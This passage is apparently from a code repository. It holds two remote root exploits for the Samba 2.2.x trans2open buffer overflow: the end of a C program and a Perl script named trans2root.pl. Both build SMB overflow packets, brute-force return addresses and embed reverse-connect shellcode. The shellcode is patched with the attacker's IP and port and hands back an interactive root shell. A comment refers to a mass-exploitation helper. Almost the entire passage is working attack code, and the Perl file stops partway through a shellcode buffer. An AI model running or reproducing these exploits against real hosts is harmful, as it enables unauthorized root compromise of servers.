netbiosheader->type = 0x00; /* session message */ 359 | netbiosheader->flags = 0x00; 360 | netbiosheader->length = htons(0x2E); 361 | 362 | smbheader->protocol[0] = 0xFF; 363 | smbheader->protocol[1] = 'S'; 364 | smbheader->protocol[2] = 'M'; 365 | smbheader->protocol[3] = 'B'; 366 | smbheader->command = 0x73; /* session setup */ 367 | smbheader->flags = 0x08; /* caseless pathnames */ 368 | smbheader->flags2 = 0x01; /* long filenames supported */ 369 | smbheader->pid = getpid() & 0xFFFF; 370 | smbheader->uid = 100; 371 | smbheader->mid = 0x01; 372 | 373 | memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1); 374 | 375 | if(write_timer(sock, 3) == 1) 376 | if (send(sock, buffer, 50, 0) < 0) return -1; 377 | 378 | memset(response, 0x00, sizeof(response)); 379 | 380 | if (read_timer(sock, 3) == 1) 381 | if (read(sock, response, sizeof(response) - 1) < 0) return -1; 382 | 383 | netbiosheader = (NETBIOS_HEADER *)response; 384 | smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); 385 | 386 | //if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n"); 387 | 388 | netbiosheader = (NETBIOS_HEADER *)buffer; 389 | smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); 390 | 391 | memset(buffer, 0x00, sizeof(buffer)); 392 | 393 | netbiosheader->type = 0x00; /* session message */ 394 | netbiosheader->flags = 0x00; 395 | netbiosheader->length = htons(0x3C); 396 | 397 | smbheader->protocol[0] = 0xFF; 398 | smbheader->protocol[1] = 'S'; 399 | smbheader->protocol[2] = 'M'; 400 | smbheader->protocol[3] = 'B'; 401 | smbheader->command = 0x70; /* start connection */ 402 | smbheader->pid = getpid() & 0xFFFF; 403 | smbheader->tid = 0x00; 404 | smbheader->uid = 100; 405 | 406 | memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1); 407 | 408 | if(write_timer(sock, 3) == 1) 409 | if (send(sock, buffer, 64, 0) < 0) return -1; 410 | 411 | memset(response, 0x00, sizeof(response)); 412 | 413 | if (read_timer(sock, 3) == 1) 414 | if (read(sock, response, sizeof(response) - 1) < 0) return -1; 415 | 416 | netbiosheader = (NETBIOS_HEADER *)response; 417 | smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); 418 | 419 | if (netbiosheader->type != 0x00) return -1; 420 | 421 | return 0; 422 | } 423 | 424 | int 425 | exploit_normal(int sock, unsigned long ret, char *shellcode) 426 | { 427 | 428 | char buffer[4000]; 429 | char exploit_data[] = 430 | "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 431 | "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" 432 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 433 | "\x00\x00\x00\x90"; 434 | 435 | int i = 0; 436 | unsigned long dummy = ret - 0x90; 437 | 438 | NETBIOS_HEADER *netbiosheader; 439 | SMB_HEADER *smbheader; 440 | 441 | memset(buffer, 0x00, sizeof(buffer)); 442 | 443 | netbiosheader = (NETBIOS_HEADER *)buffer; 444 | smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); 445 | 446 | netbiosheader->type = 0x00; /* session message */ 447 | netbiosheader->flags = 0x04; 448 | netbiosheader->length = htons(2096); 449 | 450 | smbheader->protocol[0] = 0xFF; 451 | smbheader->protocol[1] = 'S'; 452 | smbheader->protocol[2] = 'M'; 453 | smbheader->protocol[3] = 'B'; 454 | smbheader->command = 0x32; /* SMBtrans2 */ 455 | smbheader->tid = 0x01; 456 | smbheader->uid = 100; 457 | 458 | memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); 459 | 460 | buffer[1096] = 0xEB; 461 | buffer[1097] = 0x70; 462 | 463 | for (i = 0; i < 4 * 24; i += 8) { 464 | memcpy(buffer + 1099 + i, &dummy, 4); 465 | memcpy(buffer + 1103 + i, &ret, 4); 466 | } 467 | 468 | memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 469 | exploit_data, sizeof(exploit_data) - 1); 470 | memcpy(buffer + 1800, shellcode, strlen(shellcode)); 471 | 472 | if(write_timer(sock, 3) == 1) { 473 | if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; 474 | return 0; 475 | } 476 | 477 | return -1; 478 | } 479 | 480 | int 481 | exploit_openbsd32(int sock, unsigned long ret, char *shellcode) 482 | { 483 | char buffer[4000]; 484 | 485 | char exploit_data[] = 486 | "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 487 | "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" 488 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 489 | "\x00\x00\x00\x90"; 490 | 491 | int i = 0; 492 | unsigned long dummy = ret - 0x30; 493 | NETBIOS_HEADER *netbiosheader; 494 | SMB_HEADER *smbheader; 495 | 496 | memset(buffer, 0x00, sizeof(buffer)); 497 | 498 | netbiosheader = (NETBIOS_HEADER *)buffer; 499 | smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); 500 | 501 | netbiosheader->type = 0x00; /* session message */ 502 | netbiosheader->flags = 0x04; 503 | netbiosheader->length = htons(2096); 504 | 505 | smbheader->protocol[0] = 0xFF; 506 | smbheader->protocol[1] = 'S'; 507 | smbheader->protocol[2] = 'M'; 508 | smbheader->protocol[3] = 'B'; 509 | smbheader->command = 0x32; /* SMBtrans2 */ 510 | smbheader->tid = 0x01; 511 | smbheader->uid = 100; 512 | 513 | memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); 514 | 515 | for (i = 0; i < 4 * 24; i += 4) 516 | memcpy(buffer + 1131 + i, &dummy, 4); 517 | 518 | memcpy(buffer + 1127, &ret, 4); 519 | 520 | memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 521 | exploit_data, sizeof(exploit_data) - 1); 522 | 523 | memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)); 524 | 525 | if(write_timer(sock, 3) == 1) { 526 | if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; 527 | return 0; 528 | } 529 | 530 | return -1; 531 | } 532 | 533 | 534 | void shell(int sock) 535 | { 536 | fd_set fd_read; 537 | char buff[1024], *cmd="uname -a;id;\n"; 538 | int n; 539 | 540 | send(sock, cmd, strlen(cmd), 0); 541 | 542 | while(1) { 543 | FD_SET(sock,&fd_read); 544 | FD_SET(0,&fd_read); 545 | 546 | if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; 547 | 548 | if( FD_ISSET(sock, &fd_read) ) { 549 | n=read(sock,buff,sizeof(buff)); 550 | if (n == 0) { 551 | printf ("Connection closed.\n"); 552 | exit(EXIT_FAILURE); 553 | } else if (n < 0) { 554 | perror("read remote"); 555 | exit(EXIT_FAILURE); 556 | } 557 | write(1,buff,n); 558 | } 559 | 560 | if ( FD_ISSET(0, &fd_read) ) { 561 | if((n=read(0,buff,sizeof(buff)))<=0){ 562 | perror ("read user"); 563 | exit(EXIT_FAILURE); 564 | } 565 | write(sock,buff,n); 566 | } 567 | } 568 | close(sock); 569 | } 570 | 571 | void GoAway() 572 | { 573 | exit(0); 574 | } 575 | 576 | void start_listen() 577 | { 578 | FILE *fstat; 579 | int cpid; 580 | 581 | LISTENER: 582 | 583 | bzero(&serv_addr, sizeof(serv_addr)); 584 | serv_addr.sin_family=2; 585 | serv_addr.sin_addr.s_addr=0; 586 | serv_addr.sin_port=htons(port_listen); 587 | sock_listen=socket(2,1,6); 588 | 589 | if(bind(sock_listen,(struct sockaddr *)&serv_addr,16)) 590 | { 591 | port_listen++; 592 | goto LISTENER; 593 | } 594 | 595 | if(listen(sock_listen,1)) 596 | { 597 | perror("listen"); 598 | exit(1); 599 | } 600 | 601 | fprintf(stdout, "[+] Listen on port: %d\n",port_listen); 602 | 603 | cpid = fork(); 604 | 605 | if (cpid) { 606 | client=accept(sock_listen,0,0); 607 | LOOP = 0; 608 | kill(SIGUSR2, exploit_pid); 609 | if (client > 0) { 610 | fprintf(stdout, "[+] Yeah, I have a root ....!\n" 611 | "------------------------------\n"); 612 | fstat=fopen(".ROOT", "a"); //needed by mass.c 613 | fclose(fstat); 614 | shell(client); 615 | } 616 | exit(0); 617 | } 618 | } 619 | 620 | int 621 | main (int argc,char *argv[]) 622 | { 623 | char *shellcode = NULL; 624 | int typeos = -1; 625 | int port = 139; 626 | int sock = 0; 627 | int i = 0; 628 | int status = 0; 629 | int m = 0; 630 | int ip1 = 0; 631 | int ip2 = 0; 632 | int ip3 = 0; 633 | int ip4 = 0; 634 | int sta = 0; 635 | int STEPS = 512; 636 | int ENDLOOP = 64; 637 | char *desc; 638 | unsigned long MAX_CHILDS = 40; 639 | unsigned long ret = 0x0; 640 | unsigned short int a_port; 641 | struct sockaddr_in addr1; 642 | struct hostent *he; 643 | struct stat st; 644 | 645 | if (argc != 4) usage(argv[0]); 646 | 647 | typeos = atoi(argv[1]); 648 | if (typeos > 3) { 649 | fprintf(stdout, "Os type out of list!\n"); 650 | exit(1); 651 | } 652 | 653 | he = gethostbyname(argv[2]); 654 | 655 | if (he == NULL) { 656 | fprintf(stderr, "Unable to resolve\n"); 657 | return -1; 658 | } 659 | 660 | listen_pid = getpid(); 661 | start_listen(); 662 | exploit_pid = listen_pid + 1; 663 | 664 | //fprintf(stdout, "[+] Listen pid: %d, exploit pid: %d\n", listen_pid,exploit_pid); 665 | 666 | sscanf(argv[3], "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); 667 | linux_connect_back[171] = ip1; bsd_connect_back[162] = ip1; 668 | linux_connect_back[172] = ip2; bsd_connect_back[163] = ip2; 669 | linux_connect_back[173] = ip3; bsd_connect_back[164] = ip3; 670 | linux_connect_back[174] = ip4; bsd_connect_back[165] = ip4; 671 | 672 | fprintf(stdout, "[+] Connecting back to: [%d.%d.%d.%d:%d]\n", 673 | ip1, ip2, ip3, ip4, port_listen); 674 | 675 | a_port = htons(port_listen); 676 | 677 | linux_connect_back[177]= (a_port) & 0xff; 678 | linux_connect_back[178]= (a_port >> 8) & 0xff; 679 | bsd_connect_back[168]= (a_port) & 0xff; 680 | bsd_connect_back[169]= (a_port >> 8) & 0xff; 681 | 682 | switch(typeos) { 683 | case 0: 684 | desc = "Linux"; 685 | ret = 0xc0000000; 686 | shellcode = linux_connect_back; 687 | break; 688 | case 1: 689 | desc = "FreeBSD/NetBSD"; 690 | ret = 0xbfc00000; 691 | shellcode = bsd_connect_back; 692 | break; 693 | case 2: 694 | desc = "OpenBSD 3.1 and prior"; 695 | ret = 0xdfc00000; 696 | shellcode = bsd_connect_back; 697 | break; 698 | case 3: 699 | desc = "OpenBSD 3.2 non-exec stack"; 700 | ret = 0x00170000; 701 | shellcode = bsd_connect_back; 702 | break; 703 | } 704 | 705 | fprintf(stdout, "[+] Target: %s\n", desc); 706 | memcpy(&addr1.sin_addr, he->h_addr, he->h_length); 707 | 708 | addr1.sin_family = AF_INET; 709 | addr1.sin_port = htons(port); 710 | 711 | fprintf(stdout, "[+] Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port); 712 | fprintf(stdout, "[+] Please wait in seconds...!\n"); 713 | 714 | signal(SIGUSR2, GoAway); 715 | 716 | for (i = 0; i < 50; i++) childs[i] = -1; 717 | i = 0; m = 0; 718 | 719 | while (LOOP) { 720 | 721 | if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { 722 | fprintf(stderr, "[+] socket() error.\n"); 723 | exit(-1); 724 | } 725 | 726 | ret -= STEPS; i++; 727 | if ((ret & 0xff) == 0x00 && typeos != 3) ret++; 728 | 729 | m++; 730 | //fflush(0); 731 | //fprintf(stdout, "[+] Return Address: 0x%08x [%02d]\n", (unsigned int)ret, m); 732 | 733 | usleep(150000); 734 | 735 | switch (childs[i] = fork()) { 736 | case 0: 737 | if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { 738 | //fprintf(stderr, "[+] connect() error.\n"); 739 | close(sock); 740 | exit(-1); 741 | } 742 | 743 | start_session(sock); 744 | sleep(3); 745 | 746 | if (typeos != 3) { 747 | if (exploit_normal(sock, ret, shellcode) < 0) { 748 | //fprintf(stderr, " -> Failed.\n"); 749 | close(sock); 750 | exit(-1); 751 | } 752 | } else { 753 | if (exploit_openbsd32(sock, ret, shellcode) < 0) { 754 | //fprintf(stderr, " -> Failed.\n"); 755 | close(sock); 756 | exit(-1); 757 | } 758 | } 759 | sleep(5); 760 | close(sock); 761 | exit(0); 762 | break; 763 | case -1: 764 | exit(-1); 765 | break; 766 | default: 767 | if (i > MAX_CHILDS - 2) { 768 | wait(&status); 769 | i--; 770 | } 771 | break; 772 | } 773 | 774 | if (m == ENDLOOP) LOOP = 0; 775 | } 776 | 777 | if (stat(".ROOT", &st) != -1) 778 | kill(SIGUSR2, listen_pid); 779 | else { 780 | fprintf(stdout, "[+] Dohh, exploit failed.\n"); 781 | close(client); close(sock_listen); 782 | kill(listen_pid, SIGUSR2); 783 | sleep(2); 784 | exit(0); 785 | } 786 | } 787 | -------------------------------------------------------------------------------- /xpl/trans2open.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | ############### 3 | 4 | ##[ Header 5 | # Name: trans2root.pl 6 | # Purpose: Proof of concept exploit for Samba 2.2.x (trans2open overflow) 7 | # Author: H D Moore 8 | # Copyright: Copyright (C) 2003 Digital Defense Inc. 9 | # trans2root.pl -t -H -h 10 | ## 11 | 12 | use strict; 13 | use Socket; 14 | use IO::Socket; 15 | use IO::Select; 16 | use POSIX; 17 | use Getopt::Std; 18 | 19 | $SIG{USR2} = \&GoAway; 20 | 21 | my %args; 22 | my %targets = 23 | ( 24 | "linx86" => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86], 25 | "solx86" => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86], 26 | "fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86], 27 | # name # default # start # end # step # function 28 | ); 29 | 30 | getopt('t:M:h:p:r:H:P:', \%args); 31 | 32 | my $target_type = $args{t} || Usage(); 33 | my $target_host = $args{h} || Usage(); 34 | my $local_host = $args{H} || Usage(); 35 | my $local_port = $args{P} || 1981; 36 | my $target_port = $args{p} || 139; 37 | 38 | my $target_mode = "brute"; 39 | 40 | if (! exists($targets{$target_type})) { Usage(); } 41 | print "[*] Using target type: $target_type\n"; 42 | 43 | # allow single mode via the -M option 44 | if ($args{M} && uc($args{M}) eq "S") 45 | { 46 | $target_mode = "single"; 47 | } 48 | 49 | # the parent process listens for an incoming connection 50 | # the child process handles the actual exploitation 51 | my $listen_pid = $$; 52 | my $exploit_pid = StartListener($local_port); 53 | 54 | # get the default return address for single mode 55 | my $targ_ret = $args{r} || $targets{$target_type}->[0]; 56 | my $curr_ret; 57 | $targ_ret = eval($targ_ret); 58 | 59 | if ($target_mode !~ /brute|single/) 60 | { 61 | print "[*] Invalid attack mode: $target_mode (single or brute only)\n"; 62 | exit(0); 63 | } 64 | 65 | 66 | if ($target_mode eq "single") 67 | { 68 | $curr_ret = $targ_ret; 69 | if(! $targ_ret) 70 | { 71 | print "[*] Invalid return address specified!\n"; 72 | kill("USR2", $listen_pid); 73 | exit(0); 74 | } 75 | 76 | print "[*] Starting single shot mode...\n"; 77 | printf ("[*] Using return address of 0x%.8x\n", $targ_ret); 78 | my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $targ_ret); 79 | my $ret = AttemptExploit($target_host, $target_port, $buf); 80 | 81 | sleep(2); 82 | kill("USR2", $listen_pid); 83 | exit(0); 84 | } 85 | 86 | 87 | if ($target_mode eq "brute") 88 | { 89 | print "[*] Starting brute force mode...\n"; 90 | 91 | for ( 92 | $curr_ret =$targets{$target_type}->[1]; 93 | $curr_ret >= $targets{$target_type}->[2]; 94 | $curr_ret -=$targets{$target_type}->[3] 95 | ) 96 | { 97 | select(STDOUT); $|++; 98 | my $buf = $targets{$target_type}->[4]->($local_host, $local_port, $curr_ret); 99 | printf (" \r[*] Return Address: 0x%.8x", $curr_ret); 100 | my $ret = AttemptExploit($target_host, $target_port, $buf); 101 | } 102 | sleep(2); 103 | kill("USR2", $listen_pid); 104 | exit(0); 105 | } 106 | 107 | sub Usage { 108 | 109 | print STDERR "\n"; 110 | print STDERR " trans2root.pl - Samba 2.2.x 'trans2open()' Remote Exploit\n"; 111 | print STDERR "===================================\n\n"; 112 | print STDERR " Usage: \n"; 113 | print STDERR " $0 -t -H -h \n"; 114 | print STDERR " Options: \n"; 115 | print STDERR " -M (S|B) \n"; 116 | print STDERR " -r \n"; 117 | print STDERR " -p \n"; 118 | print STDERR " -P \n"; 119 | print STDERR " Targets:\n"; 120 | foreach my $type (keys(%targets)) 121 | { 122 | print STDERR " $type\n"; 123 | } 124 | print STDERR "\n"; 125 | 126 | 127 | exit(1); 128 | } 129 | 130 | 131 | sub StartListener { 132 | my ($local_port) = @_; 133 | my $listen_pid = $$; 134 | 135 | my $s = IO::Socket::INET->new ( 136 | Proto => "tcp", 137 | LocalPort => $local_port, 138 | Type => SOCK_STREAM, 139 | Listen => 3, 140 | ReuseAddr => 1 141 | ); 142 | 143 | if (! $s) 144 | { 145 | print "[*] Could not start listener: $!\n"; 146 | exit(0); 147 | } 148 | 149 | print "[*] Listener started on port $local_port\n"; 150 | 151 | my $exploit_pid = fork(); 152 | if ($exploit_pid) 153 | { 154 | my $victim; 155 | $SIG{USR2} = \&GoAway; 156 | 157 | while ($victim = $s->accept()) 158 | { 159 | kill("USR2", $exploit_pid); 160 | print STDOUT "\n[*] Starting Shell " . $victim->peerhost . ":" . $victim->peerport . "\n\n"; 161 | StartShell($victim); 162 | } 163 | exit(0); 164 | } 165 | return ($exploit_pid); 166 | } 167 | 168 | sub StartShell { 169 | my ($client) = @_; 170 | my $sel = IO::Select->new(); 171 | 172 | Unblock(*STDIN); 173 | Unblock(*STDOUT); 174 | Unblock($client); 175 | 176 | select($client); $|++; 177 | select(STDIN); $|++; 178 | select(STDOUT); $|++; 179 | 180 | $sel->add($client); 181 | $sel->add(*STDIN); 182 | 183 | print $client "echo \\-\\-\\=\\[ Welcome to `hostname` \\(`id`\\)\n"; 184 | print $client "echo \n"; 185 | 186 | while (fileno($client)) 187 | { 188 | my $fd; 189 | my @fds = $sel->can_read(0.2); 190 | 191 | foreach $fd (@fds) 192 | { 193 | my @in = <$fd>; 194 | 195 | if(! scalar(@in)) { next; } 196 | 197 | if (! $fd || ! $client) 198 | { 199 | print "[*] Closing connection.\n"; 200 | close($client); 201 | exit(0); 202 | } 203 | 204 | if ($fd eq $client) 205 | { 206 | print STDOUT join("", @in); 207 | } else { 208 | print $client join("", @in); 209 | } 210 | } 211 | } 212 | close ($client); 213 | } 214 | 215 | sub AttemptExploit { 216 | my ($Host, $Port, $Exploit) = @_; 217 | my $res; 218 | 219 | my $s = IO::Socket::INET->new(PeerAddr => $Host, PeerPort => $Port, Type 220 | => SOCK_STREAM, Protocol => "tcp"); 221 | 222 | if (! $s) 223 | { 224 | print "\n[*] Error: could not connect: $!\n"; 225 | kill("USR2", $listen_pid); 226 | exit(0); 227 | } 228 | 229 | select($s); $|++; 230 | select(STDOUT); $|++; 231 | Unblock($s); 232 | 233 | my $SetupSession = 234 | "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x08". 235 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 236 | "\x00\x00\x00\x00\x00\x00\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01". 237 | "\x00\x00\x00\x00"; 238 | 239 | my $TreeConnect = 240 | "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00\x00". 241 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x64\x00". 242 | "\x00\x00\x64\x00\x00\x00\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24". 243 | "\x25\x6e\x6f\x62\x6f\x64\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50". 244 | "\x43\x24"; 245 | 246 | my $Flush = ("\x00" x 808); 247 | 248 | print $s $SetupSession; 249 | $res = ReadResponse($s); 250 | 251 | print $s $TreeConnect; 252 | $res = ReadResponse($s); 253 | 254 | # uncomment this for diagnostics 255 | #print "[*] Press Enter to Continue...\n"; 256 | #$res = ; 257 | 258 | #print "[*] Sending Exploit Buffer...\n"; 259 | 260 | print $s $Exploit; 261 | print $s $Flush; 262 | 263 | ReadResponse($s); 264 | close($s); 265 | } 266 | 267 | sub CreateBuffer_linx86 { 268 | my ($Host, $Port, $Return) = @_; 269 | 270 | my $RetAddr = eval($Return); 271 | $RetAddr = pack("l", $RetAddr); 272 | 273 | my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host)); 274 | $a1 = chr(ord($a1) ^ 0x93); 275 | $a2 = chr(ord($a2) ^ 0x93); 276 | $a3 = chr(ord($a3) ^ 0x93); 277 | $a4 = chr(ord($a4) ^ 0x93); 278 | 279 | my ($p1, $p2) = split(//, reverse(pack("s", $Port))); 280 | $p1 = chr(ord($p1) ^ 0x93); 281 | $p2 = chr(ord($p2) ^ 0x93); 282 | 283 | my $exploit = 284 | # trigger the trans2open overflow 285 | "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". 286 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". 287 | "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". 288 | "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01". 289 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 290 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90". 291 | 292 | GetNops(772) . 293 | 294 | # xor decoder courtesy of hsj 295 | "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". 296 | "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". 297 | "\x93\x40\xe2\xfa". 298 | 299 | # reverse-connect, mangled lamagra code + fixes 300 | "\x1a\x76\xa2\x41\x21\xf5\x1a\x43\xa2\x5a\x1a\x58\xd0\x1a\xce\x6b". 301 | "\xd0\x1a\xce\x67\xd8\x1a\xde\x6f\x1e\xde\x67\x5e\x13\xa2\x5a\x1a". 302 | "\xd6\x67\xd0\xf5\x1a\xce\x7f\xf5\x54\xd6\x7d". 303 | $p1.$p2 ."\x54\xd6\x63". $a1.$a2.$a3.$a4. 304 | "\x1e\xd6\x7f\x1a\xd6\x6b\x55\xd6\x6f\x83\x1a\x43\xd0\x1e\xde\x67". 305 | "\x5e\x13\xa2\x5a\x03\x18\xce\x67\xa2\x53\xbe\x52\x6c\x6c\x6c\x5e". 306 | "\x13\xd2\xa2\x41\x12\x79\x6e\x6c\x6c\x6c\xaa\x42\xe6\x79\x78\x8b". 307 | "\xcd\x1a\xe6\x9b\xa2\x53\x1b\xd5\x94\x1a\xd6\x9f\x23\x98\x1a\x60". 308 | "\x1e\xde\x9b\x1e\xc6\x9f\x5e\x13\x7b\x70\x6c\x6c\x6c\xbc\xf1\xfa". 309 | "\xfd\xbc\xe0\xfb". 310 | 311 | GetNops(87). 312 | 313 | ($RetAddr x 8). 314 | 315 | "DDI!". ("\x00" x 277); 316 | 317 | return $exploit; 318 | } 319 | 320 | sub CreateBuffer_solx86 { 321 | my ($Host, $Port, $Return) = @_; 322 | 323 | my $RetAddr = eval($Return); 324 | my $IckAddr = $RetAddr - 512; 325 | 326 | $RetAddr = pack("l", $RetAddr); 327 | $IckAddr = pack("l", $IckAddr); 328 | 329 | # IckAddr needs to point to a writable piece of memory 330 | 331 | my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host)); 332 | $a1 = chr(ord($a1) ^ 0x93); 333 | $a2 = chr(ord($a2) ^ 0x93); 334 | $a3 = chr(ord($a3) ^ 0x93); 335 | $a4 = chr(ord($a4) ^ 0x93); 336 | 337 | my ($p1, $p2) = split(//, reverse(pack("s", $Port))); 338 | $p1 = chr(ord($p1) ^ 0x93); 339 | $p2 = chr(ord($p2) ^ 0x93); 340 | 341 | my $exploit = 342 | # trigger the trans2open overflow 343 | "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". 344 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". 345 | "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". 346 | "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01". 347 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 348 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90". 349 | 350 | GetNops(813) . 351 | 352 | # xor decoder courtesy of hsj 353 | "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". 354 | "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". 355 | "\x93\x40\xe2\xfa". 356 | 357 | # reverse-connect, code by bighawk 358 | "\x2b\x6c\x6b\x6c\xaf\x64\x43\xc3\xa2\x53\x23\x09\xc3\x1a\x76\xa2". 359 | "\x5a\xc2\xd2\xd2\xc2\xc2\x23\x75\x6c\x46\xa2\x41\x1a\x54\xfb". 360 | $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2. 361 | "\xf5\xc2\x1a\x75\xf9\x83\xc5\xc4\x23\x78\x6c\x46\xa2\x41\x21\x9a". 362 | "\xc2\xc1\xc4\x23\xad\x6c\x46\xda\xea\x61\xc3\xfb\xbc\xbc\xe0\xfb". 363 | "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc3\xc0\x1a\x71\xc3\xc1\xc0\x23\xa8". 364 | "\x6c\x46". 365 | 366 | GetNops(87) . 367 | 368 | "010101". 369 | $RetAddr. 370 | $IckAddr. 371 | $RetAddr. 372 | $IckAddr. 373 | "101010". 374 | 375 | "DDI!". ("\x00" x 277); 376 | 377 | return $exploit; 378 | } 379 | 380 | sub CreateBuffer_bsdx86 { 381 | my ($Host, $Port, $Return) = @_; 382 | 383 | my $RetAddr = eval($Return); 384 | my $IckAddr = $RetAddr - 512; 385 | 386 | $RetAddr = pack("l", $RetAddr); 387 | $IckAddr = pack("l", $IckAddr); 388 | 389 | # IckAddr needs to point to a writable piece of memory 390 | 391 | my ($a1, $a2, $a3, $a4) = split(//, gethostbyname($Host)); 392 | $a1 = chr(ord($a1) ^ 0x93); 393 | $a2 = chr(ord($a2) ^ 0x93); 394 | $a3 = chr(ord($a3) ^ 0x93); 395 | $a4 = chr(ord($a4) ^ 0x93); 396 | 397 | my ($p1, $p2) = split(//, reverse(pack("s", $Port))); 398 | $p1 = chr(ord($p1) ^ 0x93); 399 | $p2 = chr(ord($p2) ^ 0x93); 400 | 401 | my $exploit = 402 | # trigger the trans2open overflow 403 | "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00". 404 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00". 405 | "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00". 406 | "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01". 407 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". 408 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90". 409 | 410 | GetNops(830) . 411 | 412 | # xor decoder courtesy of hsj 413 | "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01". 414 | "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30". 415 | "\x93\x40\xe2\xfa". 416 | 417 | # reverse-connect, code by bighawk 418 | "\xa2\x5a\x64\x72\xc2\xd2\xc2\xd2\xc2\xc2\x23\xf2\x5e\x13\x1a\x50". 419 | "\xfb". $a1.$a2.$a3.$a4 ."\xf5\xfb". $p1.$p2. 420 | "\xf5\xc2\x1a\x75\x21\x83\xc1\xc5\xc3\xc3\x23\xf1\x5e\x13\xd2\x23". 421 | "\xc9\xda\xc2\xc0\xc0\x5e\x13\xd2\x71\x66\xc2\xfb\xbc\xbc\xe0\xfb". 422 | "\xfb\xbc\xf1\xfa\xfd\x1a\x70\xc2\xc7\xc0\xc0\x23\xa8\x5e\x13". 423 | 424 | 